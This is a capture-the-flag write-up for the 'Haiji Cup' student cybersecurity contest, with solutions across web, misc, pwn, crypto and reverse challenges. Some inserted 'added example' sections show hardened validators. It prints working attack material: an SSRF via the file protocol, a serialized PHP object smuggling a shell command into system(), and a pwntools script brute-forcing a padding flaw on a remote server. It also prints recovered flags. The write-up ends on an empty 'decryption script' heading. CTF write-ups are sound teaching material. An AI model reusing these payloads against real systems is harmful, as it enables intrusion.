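"Haiji Cup" (駭極杯) National College Student Cybersecurity Invitational WriteUp

FIRST

First-hand WriteUp for the "Haiji Cup" National College Student Cybersecurity Invitational

Special thanks to the author of this article: flam4nplus

The author has taken part in the "Anheng Cup" (安恆杯) many times with impressive results.

In this "Haiji Cup", his team finished at

rank 7 and solved every re and crypto challenge (AK).

~Congratulations!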

Web

web1

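First, capture the traffic with Burp Suite.

Change GET to POST, and post admin=1.

Visit robots.txt.

It lists source.php and flag.php.

Visiting flag.php yields nothing, so the only option is to look at source.php.

Here we see that the IP has to be forged. There are only a few headers for forging the IP: xff, xci, clientip, remoteaddr.

Here, add X-Client-IP: 127.0.0.1.

Continue by posting url.

Now we can see that an image is loaded.

I was stuck here for a long time, then suddenly wondered whether, since this is about 127.0.0.1, the file protocol might work, and tried it.

It still loads, and the image above also shows that the content is not a jpg but html, so curl it.

Along the way we also get the challenge source code: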

<?php
error_reporting(0);
include "flag.php";
echo "you need to login as admin!";
echo "<!-- post param  'admin' -->";
if(isset($_POST['admin']))
{
    if($_POST['admin']==1)
    {
        if($_SERVER['HTTP_X_CLIENT_IP'])
        {
            if(isset($_POST['url']) && parse_url($_POST['url'])['host']=='www.ichunqiu.com')
            {
                $curl = curl_init();
                curl_setopt($curl, CURLOPT_URL, $_POST['url']);
                curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
                $content = curl_exec($curl);
                curl_close($curl);
                $filename='download/'.rand().';img1.jpg';
                file_put_contents($filename,$content);
                echo $_POST['url'];
                $img="<img src=\"".$filename."\"/>";
                echo $img;
            }
            else
            {
                echo "you need post url: http://www.ichunqiu.com";
            }
        }
        else
        {
            echo "only 127.0.0.1 can get the flag!!";
        }
    }

}
else
{
    $_POST['admin']=0;
}

And with that we also get the flag.
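The gap in the check above, as an added example (not code from the challenge or the original write-up): the source compares only the host component of the posted URL, so a non-HTTP scheme carrying the expected host still passes. The Python port below contrasts that check with a stricter validator; `strict_check`, the injected `resolve` callback and the sample URLs are assumptions constructed for illustration.

```python
import ipaddress
from urllib.parse import urlsplit

ALLOWED_HOST = "www.ichunqiu.com"       # host the challenge expects
ALLOWED_SCHEMES = {"http", "https"}

# Constructed sample inputs (not taken from the challenge traffic).
SAMPLES = [
    "http://www.ichunqiu.com/",
    "file://www.ichunqiu.com/tmp/constructed-example.txt",
    "http://user@www.ichunqiu.com/",
]


def weak_check(url):
    """Port of the challenge's test: only the host component is compared."""
    return urlsplit(url).hostname == ALLOWED_HOST


def strict_check(url, resolve):
    """Hypothetical hardened validator.

    resolve(host) -> list of IP strings; injected so the example runs offline.
    """
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return False                    # rejects file:// and any other non-HTTP scheme
    if parts.hostname != ALLOWED_HOST or parts.username or parts.password:
        return False
    try:
        port = parts.port
    except ValueError:                  # malformed port
        return False
    if port not in (None, 80, 443):
        return False
    # The fetch must not land on loopback, private or otherwise non-public space.
    return all(ipaddress.ip_address(ip).is_global for ip in resolve(parts.hostname))


def fake_resolver(host):
    """Constructed DNS answer so the example needs no network access."""
    return ["8.8.8.8"]


if __name__ == "__main__":
    for url in SAMPLES:
        print(url, weak_check(url), strict_check(url, fake_resolver))
```

In the PHP original, the matching fixes are restricting cURL to HTTP(S) with `CURLOPT_PROTOCOLS` and deciding locality from `REMOTE_ADDR` instead of the client-supplied `X-Client-IP` header.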

web2

For this challenge, a scanner first turned up the leaked source code:

<?php
error_reporting(0);
class come{    
    private $method;
    private $args;
    function __construct($method, $args) {
        $this->method = $method;
        $this->args = $args;
    }
    function __wakeup(){
        foreach($this->args as $k => $v) {
            $this->args[$k] = $this->waf(trim($v));
        }
    }
    function waf($str){
        $str=preg_replace("/[<>*;|?\n ]/","",$str);
        $str=str_replace('flag','',$str);
        return $str;
    }           
    function echo($host){
        system("echo $host");
    }
    function __destruct(){
        if (in_array($this->method, array("echo"))) {
            call_user_func_array(array($this, $this->method), $this->args);
        }
    } 

}

$first='hi';
$var='var';
$bbb='bbb';
$ccc='ccc';
$i=1;
foreach($_GET as $key => $value) {
        if($i===1)
        {
            $i++;   
            $$key = $value;
        }
        else{break;}
}
if($first==="doller")
{
    @parse_str($_GET['a']);
    if($var==="give")
    {
        if($bbb==="me")
        {
            if($ccc==="flag")
            {
                echo "<br>welcome!<br>";
                $come=@$_POST['come'];
                unserialize($come); 
            }
        }
        else
        {echo "<br>think about it<br>";}
    }
    else
    {
        echo "NO";
    }
}
else
{
    echo "Can you hack me?<br>";
}
?>

Then comes the deserialization vulnerability.

Just use HackBar from the Firefox F12 developer tools:

http://8c2a8dee973d47ffbf0027140ec9e6dfc88e980052e84454.game.ichunqiu.com/?first=doller&a=var=give%26bbb=me%26ccc=flag

come=O%3A4%3A%22come%22%3A2%3A%7Bs%3A12%3A%22%00come%00method%22%3Bs%3A4%3A%22echo%22%3Bs%3A10%3A%22%00come%00args%22%3Ba%3A1%3A%7Bs%3A4%3A%22host%22%3Bs%3A20%3A%22123%26cat%24%7BIFS%7D%2Ffl%22%22ag%22%3B%7D%7D123

This yields the flag directly.
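An added example (not part of the original write-up or the challenge): a small Python parser for PHP's serialize format, run over the URL-decoded `come` body shown above, together with a port of `waf()` showing that the blacklist leaves the argument untouched while an allowlist rejects it. `parse`, `is_plain_host`, `inspect` and the allowlist pattern are assumptions introduced for illustration.

```python
import re
from urllib.parse import unquote_to_bytes

# The `come` POST body shown above, still URL-encoded.
PAYLOAD = (
    "O%3A4%3A%22come%22%3A2%3A%7Bs%3A12%3A%22%00come%00method%22%3B"
    "s%3A4%3A%22echo%22%3Bs%3A10%3A%22%00come%00args%22%3Ba%3A1%3A%7B"
    "s%3A4%3A%22host%22%3Bs%3A20%3A%22123%26cat%24%7BIFS%7D%2Ffl%22%22ag%22%3B%7D%7D123")

def parse(buf, pos=0):
    """Parse one PHP-serialized value at buf[pos]; return (value, next_pos)."""
    kind = buf[pos:pos + 1]
    if kind == b"i":                        # i:<int>;
        end = buf.index(b";", pos)
        return int(buf[pos + 2:end]), end + 1
    if kind == b"s":                        # s:<len>:"<bytes>";
        colon = buf.index(b":", pos + 2)
        start = colon + 2
        end = start + int(buf[pos + 2:colon])
        return buf[start:end], end + 2
    if kind in (b"a", b"O"):                # a:<n>:{..}  O:<len>:"<class>":<n>:{..}
        cls, pos = None, pos + 2
        if kind == b"O":
            colon = buf.index(b":", pos)
            start = colon + 2
            end = start + int(buf[pos:colon])
            cls, pos = buf[start:end], end + 2
        colon = buf.index(b":", pos)
        count, pos = int(buf[pos:colon]), colon + 2
        items = {}
        for _ in range(count):
            key, pos = parse(buf, pos)
            items[key], pos = parse(buf, pos)
        return {"class": cls, "props": items}, pos + 1
    raise ValueError("unsupported type %r at offset %d" % (kind, pos))

def waf(value):
    """Port of come::waf(): delete blacklisted characters, then the word 'flag'."""
    value = re.sub(r"[<>*;|?\n ]", "", value.strip())
    return value.replace("flag", "")

def is_plain_host(value):
    """Hypothetical allowlist: letters, digits, dots and hyphens only."""
    return re.fullmatch(r"[A-Za-z0-9.-]{1,253}", value) is not None

def inspect(payload=PAYLOAD):
    """Return (class, trailing bytes, host argument, survives waf?, passes allowlist?)."""
    raw = unquote_to_bytes(payload)
    obj, end = parse(raw)
    # Private properties are stored as "\0<class>\0<name>".
    args = obj["props"][b"\x00come\x00args"]["props"]
    host = args[b"host"].decode()
    return obj["class"], raw[end:], host, waf(host) == host, is_plain_host(host)
```

The same inspection works on request logs: an `O:` prefix with `\0class\0` property names in a POST field means user input is reaching `unserialize()`, and that call is the part to remove.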

Misc

Sign-in

Very simple base32; just decode it online.

MZWGCZ33GM2TEMRSMQZTALJUGM4WKLJUMFTGELJZGFTDILLBMJSWEYZXGNTGKMBVMN6Q

easy-py

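I happened to set a challenge of this type before, but that earlier WP was too brief, and I have forgotten most of the pyc bytecode. This time I quickly gathered the material and saved the relevant parts. Reference links:
https://github.com/python/cpython/blob/master/Include/opcode.h
https://bbs.pediy.com/thread-246683.htm
https://das.scusec.org/2017/03/24/pythonopcode/
http://unpyc.sourceforge.net/Opcodes.html

The opcodes, after tidying up, are as follows: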

03f3 0d0a 
bebc ce5b 
63
00 0000 00
00 000000
0f 0000 00
40 0000 00
73 
b200 0000  length 178
710600    JUMP_ABSOLUTE
642333    LOAD_CONST
710900    JUMP_ABSOLUTE       12 items
640000    LOAD_CONST  0   
640100    LOAD_CONST  1
640200    LOAD_CONST  2
640300    LOAD_CONST  3
640400    LOAD_CONST  4
640500    LOAD_CONST  5
640200    LOAD_CONST  2
640600    LOAD_CONST  6
640600    LOAD_CONST  6
640700    LOAD_CONST  7
640800    LOAD_CONST  8
640900    LOAD_CONST  9
640a00    LOAD_CONST  a
640b00    LOAD_CONST  b
640c00    LOAD_CONST  c


670f00    BUILD_LIST  f   cmp[0xf]
5a0000    STORE_NAME  0   
m[0xf]=[0,10,7,1,29,14,7,22,22,31,57,30,9,52,27]

650100    LOAD_NAME   1   raw_input
830000    CALL_FUNCTION   0
5a0200    STORE_NAME  2   flag

640000    LOAD_CONST  0   0
5a0300    STORE_NAME  3   m=0

{

785b00    SETUP_LOOP  while

650200    LOAD_NAME   2   flag
44        GET_ITER
5d5300    FOR_ITER
5a0400    STORE_NAME  4   i=..

650500    LOAD_NAME   5   ord
650400    LOAD_NAME   4   
830100    CALL_FUNCTION   ord(i)

0f         UNARY_INVERT  ~
640d00    LOAD_CONST  d       102
40        BINARY_AND  &

650500    LOAD_NAME   5
650400    LOAD_NAME   4
830100    CALL_FUNCTION   1 ord(i)
641200    LOAD_CONST  0x12    -103
40        BINARY_AND  &

42        BINARY_OR   |

5a0400    STORE_NAME  4   i=..
650400    LOAD_NAME   4   

650000    LOAD_NAME   0   cmp
650300     LOAD_NAME   3   m
19        BINARY_SUBSCR   []

6b0200    COMPARE_OP  2       ==  
7290 00    POP_JUMP_IF_FALSE

650300    LOAD_NAME   3   m
0b         UNARY_NEGATIVE -m
640e00    LOAD_CONST  0xe -1
17        BINARY_ADD  +
0b         UNARY_NEGATIVE -
5a0300    STORE_NAME  3   m=...

714900    JUMP_ABSOLUTE   

714900    JUMP_ABSOLUTE

640f00     LOAD_CONST  f wrong
47        PRINT_ITEM
48        PRINT_NEWLINE

650600    LOAD_NAME   6   exit
830000 CALL_FUNCTION    0
01        POP_TOP
714900 JUMP_ABSOLUTE
57        POP_BLOCK

641000    LOAD_CONST  right
47        PRINT_ITEM
48         PRINT_NEWLINE
641100
53        return


28        (STORE_SLICE
130000 00

69 
0000 0000 

69
0a 000000

69 
0700 0000 

69
0100 00 00
69 
1d00 0000 
69
0e00 00 00
69 
1600 0000 
69
1f 0000 00
69 
39000000 
69
1e 0000 00
69 
0900 0000 
69
34 000000
69 
1b00 0000 
69
66 0000 00
69 
ffff ffff

74
0500 00 00
7772 6f6e67 wrong
74
05 0000 00
7269 67 6874  right
4e69 99ff ffff 


28(
07 0000 00

74
0300 0000 
636d 70        cmp

74 
0900 0000 
7261 775f696e 7075 74 raw_input
74 
0400 0000 
666c 6167     flag
74
010000 00
6d             m
74
01 0000 00
69             i
74
03 0000 00
6f7264         ord

74
04 0000 00
65 7869 74    exit
)

28 
0000 0000

28
00 0000 00

28 
0000 0000 

73
0a 0000 00
65 6173 795f 7079 2e70 79    easy_py.pyc

74 
0800 0000 
3c6d 6f64 756c 653e     <module>

0100 0000 

73
14 0000 00
33 01 09 01 06 010d 011f 0110 010c 0106 0205 010b 02

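While working on this I fell into a pit: the opcode tables online are incomplete, so for

6b0200    COMPARE_OP  2       ==  
7290 00    POP_JUMP_IF_FALSE

I had no idea what they were and was stuck on them for a long time. The decryption script is as follows: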

cmp=[0,10,7,1,29,14,7,22,22,31,57,30,9,52,27]
flag=[]
j=0
for c in range(15):
    for i in range(256):
        if cmp[j] == ((~i)&102)|(i&(-103)):
            j=j+1
            flag.append(chr(i))
            break
print "".join(flag)
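An added example (not the author's script): a minimal Python 2.7 bytecode disassembler covering the opcodes that appear in the listing above, including the two that the online tables were missing, run over the loop body bytes from that listing. It also rebuilds the comparison list from the `LOAD_CONST` indices and inverts the check with a single XOR, since `(~x & 102) | (x & -103)` equals `x ^ 102`. Offsets are relative to the snippet, and the function names are introduced here for illustration.

```python
HAVE_ARGUMENT = 90   # Python 2.7: opcodes >= 90 carry a 2-byte little-endian argument
OPNAMES = {
    0x01: "POP_TOP", 0x0b: "UNARY_NEGATIVE", 0x0f: "UNARY_INVERT",
    0x17: "BINARY_ADD", 0x19: "BINARY_SUBSCR", 0x40: "BINARY_AND",
    0x42: "BINARY_OR", 0x44: "GET_ITER", 0x47: "PRINT_ITEM", 0x48: "PRINT_NEWLINE",
    0x53: "RETURN_VALUE", 0x57: "POP_BLOCK", 0x5a: "STORE_NAME", 0x5d: "FOR_ITER",
    0x64: "LOAD_CONST", 0x65: "LOAD_NAME", 0x67: "BUILD_LIST", 0x6b: "COMPARE_OP",
    0x71: "JUMP_ABSOLUTE", 0x72: "POP_JUMP_IF_FALSE", 0x78: "SETUP_LOOP",
    0x83: "CALL_FUNCTION",
}
CMP_OPS = ("<", "<=", "==", "!=", ">", ">=", "in", "not in", "is", "is not")
# co_names and co_consts as recovered in the dump above
NAMES = ("cmp", "raw_input", "flag", "m", "i", "ord", "exit")
CONSTS = (0, 10, 7, 1, 29, 14, 22, 31, 57, 30, 9, 52, 27,
          102, -1, "wrong", "right", None, -103)
# Loop body bytes copied from the listing (LOAD_NAME flag ... POP_JUMP_IF_FALSE)
LOOP = bytes.fromhex(
    "650200" "44" "5d5300" "5a0400" "650500" "650400" "830100" "0f" "640d00" "40"
    "650500" "650400" "830100" "641200" "40" "42" "5a0400" "650400"
    "650000" "650300" "19" "6b0200" "729000")
# Constant indices pushed before BUILD_LIST 15
LIST_IDX = (0, 1, 2, 3, 4, 5, 2, 6, 6, 7, 8, 9, 10, 11, 12)

def disassemble(code):
    """Return (offset, opname, decoded argument) for each instruction."""
    out, pc = [], 0
    while pc < len(code):
        op = code[pc]
        name = OPNAMES.get(op, "<0x%02x>" % op)
        if op < HAVE_ARGUMENT:              # one-byte instruction
            out.append((pc, name, None))
            pc += 1
            continue
        arg = code[pc + 1] | code[pc + 2] << 8
        if name in ("LOAD_NAME", "STORE_NAME"):
            arg = NAMES[arg]
        elif name == "LOAD_CONST":
            arg = CONSTS[arg]
        elif name == "COMPARE_OP":
            arg = CMP_OPS[arg]
        out.append((pc, name, arg))
        pc += 3
    return out

def recover_flag():
    """Invert the per-character transform, which is a plain XOR with 102."""
    assert all(((~x & 102) | (x & -103)) == x ^ 102 for x in range(256))
    return "".join(chr(CONSTS[i] ^ 102) for i in LIST_IDX)

if __name__ == "__main__":
    for row in disassemble(LOOP):
        print("%3d %-18s %r" % row)
    print(recover_flag())
```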

Pwn

aessss

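After getting the source, we find that the unpad function performs no check, so by tampering with the padding we can brute-force the flag byte by byte from back to front and recover it in full.

The script is as follows: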

from pwn import * 
import base64, time, random, string
from Crypto.Cipher import AES
from Crypto.Hash import SHA256, MD5

#context.log_level = 'debug'

def choice1():
    p.sendline('1')
    p.recvuntil('Here is the encrypted flag: 0x', drop = True)
    enflag = p.recvuntil('\nWelcome to AES(WXH) encrypt system.', drop = True)
    #print enflag
    p.recvuntil('Your choice:', drop = True)
    return enflag

def choice2(pad):
    p.sendline('2')
    p.recvuntil('Pad me something:', drop = True)
    p.sendline(pad)
    p.recvuntil('Your choice:', drop = True)

def bypassproof():
    p.recvuntil('sha256(XXXX+')
    lastdata = p.recvuntil(')', drop=True)
    print lastdata
    p.recvuntil(' == ')
    digest = p.recvuntil('\nGive me XXXX:', drop=True)
    print digest
    def proof(s):
        return SHA256.new(s + lastdata).hexdigest() == digest
    data = pwnlib.util.iters.mbruteforce(proof, string.ascii_letters + string.digits, 4, method='fixed')
    print data
    p.sendline(data)
    #p.recvuntil('Done!\n')

p = remote('106.75.13.64', 54321)
bypassproof()
p.recvuntil('Your choice:', drop = True)
flag_enc = choice1()
#print encflag
flag = ""
for i in range(33):
    a = ''.join(['a' for _ in range(223)])
    a = a[:-1] + chr(224 + i)
    for c in string.printable:
        #print c+flag
        choice2(a)
        choice2(c+flag)
        if choice1() == flag_enc:
            flag = c + flag
            print "success:"+flag
            break
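An added example (not the challenge's source, which the write-up does not show): an unpad that trusts the final byte, next to a PKCS#7 unpad that validates it. The buffer layout of 33 secret bytes followed by 223 caller-supplied pad bytes ending in `224 + i` is an assumption inferred from the constants in the script above, and `SECRET` is a constructed stand-in.

```python
BLOCK = 16
SECRET = b"flag{" + b"x" * 27 + b"}"      # constructed 33-byte stand-in for the flag


def unpad_unchecked(data):
    """Assumed shape of the flawed routine: the last byte is trusted as the pad length."""
    return data[:-data[-1]]


def unpad_strict(data):
    """PKCS#7 unpad that validates the length byte and every padding byte."""
    if not data or len(data) % BLOCK:
        raise ValueError("length is not a multiple of the block size")
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("invalid padding")
    return data[:-n]


def buffer_with_pad(i):
    """33 secret bytes + 223 caller-supplied pad bytes, the last one being 224 + i."""
    return SECRET + b"a" * 222 + bytes([224 + i])


def strict_rejects(data):
    """True when unpad_strict refuses the buffer."""
    try:
        unpad_strict(data)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    for i in (0, 1, 5):
        buf = buffer_with_pad(i)
        # The unchecked version cuts into the secret itself; the strict one refuses.
        print(i, len(unpad_unchecked(buf)), strict_rejects(buf))
```

With the unchecked version the caller decides how many trailing bytes of the secret are dropped before encryption, which is what makes the byte-at-a-time comparison against the encrypted flag possible; the strict version removes that control.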

Crypto

rsaaaa

First we have to pass the proof of work. The script is as follows:

import string
from hashlib import sha512

# Brute-force the 4-character XXXX such that sha512(pad + XXXX) == shavalue
def brute_force(pad, shavalue):
    dict = string.letters + string.digits
    key = ""
    for i1 in dict:
        tmp = key
        key1 = tmp + i1
        for i2 in dict:
            tmp = key1
            key2 = tmp + i2
            for i3 in dict:
                tmp = key2
                key3 = tmp + i3
                for i4 in dict:
                    tmp = key3
                    key4 = tmp + i4
                    final_key = key4
                    if sha512(pad+key4).hexdigest()==shavalue:
                        print key4
                        return key4
key_1 = brute_force('XkJ6v0Svif9H5wWd','6eb77ec24eee0fd5e59290c44acf22e377a3b08e33e0efa2bfd9971dbacf3e8a3bc32eed2fc710ddb26863f01dd82c63224fdc9851d9f9f46a9e6402c68206f5')
print key_1

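Next we need to solve the problem posed here.

It turns out there is no need to solve for its d and n at all.

Simply take d=1, n=c-m.

That takes us straight to the next stage.

Here we need a bit of math: first compute cc = pow(2, e, n), then ccc = c*cc%n, then send ccc to the server to decrypt, and divide the returned plaintext by 2.

The result is MM.

After posting it, decrypt with AES directly to get the flag.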
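The two steps above as an added Python example (not the author's exp or the challenge's code): stage 1 shows why d=1, n=c-m satisfies the check, and stage 2 reproduces the multiply-by-2^e step against a toy decryption oracle, which works because unpadded RSA is multiplicative. The toy key, `forge_key`, `make_oracle` and `recover` are assumptions built for illustration; `recover` uses the modular inverse of 2, which generalises the divide-by-2 to the case where 2m exceeds n.

```python
# Constructed toy key from two Mersenne primes; the challenge's real key is 2048-bit.
P, Q = 2**31 - 1, 2**61 - 1
N, E = P * Q, 65537
D = pow(E, -1, (P - 1) * (Q - 1))

# Values from this write-up: the plaintext the server returned and the MM sent back.
PAGE_REPLY = 0xce6adae4ac9ec86c8ee264a28ae2a46e
PAGE_MM = 0x67356d72564f64364771325145715237


def forge_key(m, c):
    """Stage 1: a pair (n, d) with pow(c, d, n) == m, without the real key."""
    n = c - m
    if n <= m:
        raise ValueError("needs c > 2*m so that c mod (c - m) == m")
    return n, 1


def make_oracle(c_forbidden):
    """Model of stage 2: decrypts anything except the target ciphertext."""
    def oracle(x):
        if x % N == c_forbidden:
            raise PermissionError("no c")
        return pow(x, D, N)
    return oracle


def recover(c, oracle, s=2):
    """Dec(c * s^e mod n) = s * m mod n, so multiply the reply by s^-1."""
    blinded = c * pow(s, E, N) % N
    sm = oracle(blinded)
    return sm * pow(s, -1, N) % N       # equals sm // 2 whenever 2*m < n


if __name__ == "__main__":
    m = int.from_bytes(b"constructed", "big")   # constructed plaintext
    c = pow(m, E, N)
    print(recover(c, make_oracle(c)) == m)
    print(hex(PAGE_REPLY // 2) == hex(PAGE_MM))
```

Both stages disappear once the service stops accepting a caller-chosen modulus and uses padded RSA (for example OAEP) instead of raw modular exponentiation.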

The whole interaction is as follows:

sha512(XkJ6v0Svif9H5wWd+XXXX) == 6eb77ec24eee0fd5e59290c44acf22e377a3b08e33e0efa2bfd9971dbacf3e8a3bc32eed2fc710ddb26863f01dd82c63224fdc9851d9f9f46a9e6402c68206f5

Tell me XXXX:
ZTmx
OK, you proof.
Give you a message:0x6f57434e74344a6a4831485177694169
and its ciphertext:0xaef0ac66619ad00415bdf53f3232fffb1e19be5ae92b187f98544187f4021d9192b731f3bdedcf024310e918b6dcf052c6c13bca7587650806bcabcba0943ada57abfe8ec6aed1749ebf35d6c1716fd40c5fed105f1604caed170421b2e12efcb174b38bf2427331e2a22bdd4731c004c4d714a3a593b2cd0fd0031968526a4420ff2adfc0b752ddf9c2381e8cfd98f0471e820ee5ee8b83955730bc1087b12151ce0c65b4a90b84555c12db8053429ee6c40e7977b087829bec0e7dc42632d9c16a162500893ac635e3b6c4e1d3e34f069cbdc8183c19a28e400751ae1c9168d0689c0162ce59852170394eb881ab99130a4837422e5081143a2b62a3bc76d8
Please give me the private key to decrypt cipher
n:
22084145559267142542278247205711206806769035096867203562084376236135074979071593494695165415304475011906014512427242327757399235206725659075262541485105057336477881466546208394134375073948200202231086452529564372313656850419369453050936175671378881331075871605986332054320133956210417108252203550155296981956383715305509205993100035845876676100308496728282263311014876821564144113735314621093460404122348973685951350134860330087006324081818356485787747916004167088733576488568724106608053548411305492271813170870510029120401564662767509523812680234467117029176109380429489145638460342248988331319677739729495421826415
d:
1
Oh, how you know the private key!
n=0xac53a7e7f4a8ddb0d52b6df045527551d541a40365116ae66e9d8709442ffcfd786a8df7d203e117a709553d510edece5ae72c8e6f9a9552b4be987e6f2021f2a339930cdb221a8d484ea09df63c2a55f582b3c9ade2912c9650786e9f5c82973e2baea122cb895d06fa174a106d4660740f0c204666dc69168e330b2c41a78633bf24d48d023a6c0bdfa2f3761c4f38d081b5bf8c9ffd11abbe4d5be6e63f064125b3ead319c09242f5366124a0bfc8f73ba11a067a7904fec9c5497b3f376382427e3e60e95ae747cce634d721009cd13350b1cf2383c6880c05ff8ec7824339ea438ea800b5d15ec05fd0df7e53c569e1951560a75eb289f3afdf19beded1
e=0xcf90945cb5ed1485
c=0x9a9c94ec0094c5e3c1e1b6c2b534b637726cba2e8b0da0a2ba3f12cb98a225206755f13a7ae3e459489e253a6b4719645d741a48d3b47184a2bc8cc6be73b4040443821dc7796754cf5f40c3d9845f15f23486d50d06fdbcde6c017599703ac9ec6015ae61b67379f48272f4f84491506bc3e56eaf124c9b14584330657a26b4cc009c489441cafc3ed5555ff2f5806a5b56eb0d312dfea2ad985e37b5a3917f7930b492331bc1e12f71949ae7d76c53a44c5d9f7d25e8856aafd69f3b6bcfb44e5cf2fa9c09aa35bf4b6566c89f174d0c68abd8970aa41e1fe441c4b38c705979e33d5c9a2abf15560477c31b6346fcfc723289b9751f893fb7a8dac47de3f0

Now, you have a chance to decrypt something(but no c):
10861852131164322077412797986625616181717063053353581369663738748831496772954289381470035381197611133580693273961257855424019526480196780126545278666064266535981465755567420264745935227134754534350002537986969850551526328493939419096511440892423045037104987011041181269866090307965509267257918136812218547637066029308872688916113197541758600923169257485066711422003515732668822443487279464330075761022284709750952016470762309134261713817800958762289127439071427678699871872454105477099012449462911427691966935866152040055058801656487819090362844926572779942769475645537130146301058513228439997764047914117721832371520
message:0xce6adae4ac9ec86c8ee264a28ae2a46e
Give me right message:
137187895140717694653920589162394767927
Master in math!
Here is your flag:0x4af4a66ee3ff9bb620e20db7e0f3489bbf4bb358ad8d39a4a446ff4338570a241ec06f2d3703c7cfc1a1c6c0fce789e0

The exp is as follows:

#!/usr/bin/python
import random
import string
from hashlib import sha512
from Crypto.Util.number import *
from Crypto.Cipher import AES

'''
def brute_force(pad, shavalue):
    dict = string.letters + string.digits
    key = ""
    for i1 in dict:
        tmp = key
        key1 = tmp + i1
        for i2 in dict:
            tmp = key1
            key2 = tmp + i2
            for i3 in dict:
                tmp = key2
                key3 = tmp + i3
                for i4 in dict:
                    tmp = key3
                    key4 = tmp + i4
                    final_key = key4
                    if sha512(pad+key4).hexdigest()==shavalue:
                        print key4
                        return key4
key_1 = brute_force('XkJ6v0Svif9H5wWd','6eb77ec24eee0fd5e59290c44acf22e377a3b08e33e0efa2bfd9971dbacf3e8a3bc32eed2fc710ddb26863f01dd82c63224fdc9851d9f9f46a9e6402c68206f5')
print key_1


m = 0x6f57434e74344a6a4831485177694169
c = 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

print c-m





n=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
e=0xcf90945cb5ed1485
c=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

cc = pow(2,e,n)
ccc = c*cc%n
print ccc

m = 0xce6adae4ac9ec86c8ee264a28ae2a46e

print m/2

'''
enc_flag = '4af4a66ee3ff9bb620e20db7e0f3489bbf4bb358ad8d39a4a446ff4338570a241ec06f2d3703c7cfc1a1c6c0fce789e0'
enc_flag = enc_flag.decode('hex')
msg1 = '6f57434e74344a6a4831485177694169'.decode('hex')
msg2 = '67356d72564f64364771325145715237'.decode('hex')
cipher = AES.new(msg2, AES.MODE_CBC, msg1)
dec = cipher.decrypt(enc_flag)

print dec

Reverse

cpp

Basically a warm-up challenge; if you know a little C++ it will not feel so unfamiliar.

fake=[0x99, 0xb0, 0x87, 0x9e, 0x70, 0xe8, 0x41, 0x44, 0x05, 0x04, 0x8b, 0x9a, 0x74, 0xbc, 0x55, 0x58, 0xb5, 0x61, 0x8e, 0x36, 0xac, 0x09, 0x59, 0xe5,
 0x61, 0xdd, 0x3e, 0x3f, 0xb9, 0x15, 0xed, 0xd5]
a = 0x99
b = 0xb0
c = 0x87
d = 0x9e
flag=[]

src=[0 for i in range(32)]
xor1=[0 for i in range(32)]
xor2=[0 for i in range(32)]
xor3=[0 for i in range(32)]
xor4=[0 for i in range(32)]
src[0]=a
src[1]=b
src[2]=c
src[3]=d

xor1[0]=a
xor1[1]=b^a
xor1[2]=a^b^c
xor1[3]=a^b^c^d

xor2[0]=a
xor2[1]=b
xor2[2]=a^c
xor2[3]=d^b

xor3[0]=a
xor3[1]=a^b
xor3[2]=c^b
xor3[3]=d^c

xor4[0]=a
xor4[1]=b
xor4[2]=c
xor4[3]=d

for i in range(4,32):
    for j in range(256):
        src[i]=j
        xor1[i]=(xor1[i-1]^src[i])&0xff
        xor2[i]=(xor2[i-1]^xor1[i])&0xff
        xor3[i]=(xor3[i-1]^xor2[i])&0xff
        xor4[i]=(xor4[i-1]^xor3[i])&0xff
        if xor4[i]==fake[i]:
            break

for i in range(32):
    for j in range(256):
        tmp = j*4
        result = (((j>>6)|tmp)^i)&0xff
        if result == src[i]:
            flag.append(chr(j))
            break
print "".join(flag)#flag{W0w_y0u_m4st3r_C_p1us_p1us}

flag{W0w_y0u_m4st3r_C_p1us_p1us}

cyvm

This one was only released near the end; it is a very simple VM challenge. The bytecode is as follows:

op    d1  d2
[0x0F,                      scanf(%s)   s
0x10, 0x14, 0x20,            r0=0x20
0x10, 0x16, 0x00,             r2=0
0x09, 0x24,                 point=0x24  jmp code[0x24]
label code[0x9]:
0x02, 0x15, 0x16,             r1=s[r2]            r2=0    r1=s[0]
0xE9,                         ++i
0x12, 0x16,                 v2 = 2  r2++        r2=1
0xE8,                         ++i
0x02, 0x17, 0x16,             r3=s[r2]                    r3=s[1]
0x13, 0x16,                 v3 = 2  r2--        r2=0
0x90,                         ++i
0x06, 0x15, 0x17,             r1=r1^r3            r1=s[0]^s[1]
0x45,                         ++i
0x06, 0x15, 0x16,             r1=r1^r2            r1=s[0]^s[1]^r2
0x76,                         ++i
0x01, 0x15, 0x16,             s[r1]=r2            s[r1]=0
0x12, 0x16,                 v2=2    r2++
0xFF,                         ++i

label code[0x24]:
0x0A, 0x14, 0x16,            v9  = r0 != r2

0x0C, 0x09,                    if(v9) true point = d1
0x0E                        sub_4006d6()!=0

Decryption script:

c = [0x0A, 0x0C, 0x04, 0x1F, 0x48, 0x5A, 0x5F, 0x03, 0x62, 0x67, 0x0E, 0x61, 0x1E, 0x19, 0x08, 0x36, 0x47, 0x52, 0x13, 0x57, 0x7C, 0x39, 0x54, 0x4B, 0x05, 0x05, 0x45, 0x77, 0x15, 0x26, 0x0E, 0x62]


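# flag=[]
# What the VM does to the input (reference only, never called)
def encode(flag='a'*0x20):
    s=[ord(ch) for ch in flag]+[0]   # the NUL terminator follows the 32 input bytes
    return [s[i]^s[i+1]^i for i in range(32)]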


def decode():
    flag=["}"]
    a=[]
    tmp = 125
    for i in range(30,-1,-1):
        tmp = c[i]^tmp^i
        flag.append(chr(tmp))
    print "".join(flag[::-1])

decode()

flag{7h15_15_MY_f1rs7_s1mpl3_Vm}

What's_it

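The first part brute-forces a 6-character a-z string by MD5, which gives the luck string ozulmt. The program then enters a self-decoding section, and only after that comes the part that really verifies the flag: it first checks the flag format, extracts the content after formatting, and finally compares it with fixed data. The brute-force script is as follows: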

import hashlib
import string
dic = string.ascii_lowercase
may_fla = []
for i in dic:
    for j in dic:
        for m in dic:
            for n in dic:
                for p in dic:
                    for q in dic:
                        flag=i+j+m+n+p+q
                        # print flag
                        hl = hashlib.md5()
                        hl.update(flag.encode(encoding='utf-8'))
                        flag_md5 = hl.hexdigest()
                        count=0
                        index_sum=0
                        for c in range(32):
                            if flag_md5[c] == '0':
                                count = count+1
                                index_sum = index_sum+c
                        if (10*count+index_sum) == 403:
                            may_fla.append(flag)
print may_fla

The decryption script is as follows:

